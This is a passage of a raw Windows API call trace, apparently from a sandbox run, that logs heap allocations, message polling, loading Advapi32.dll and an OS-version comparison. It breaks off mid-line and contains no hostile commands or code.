[0209.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.721] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.722] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.723] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.725] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0209.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0209.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.725] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0209.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.726] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.726] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0209.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0209.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0209.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.727] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0209.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0209.727] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0209.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0209.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0209.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0209.728] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.728] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.729] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.730] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0209.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.731] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0209.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.732] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0209.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0209.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.732] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0209.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0209.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0209.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0209.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0209.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.734] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0209.735] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.735] RtlAllocateHeap 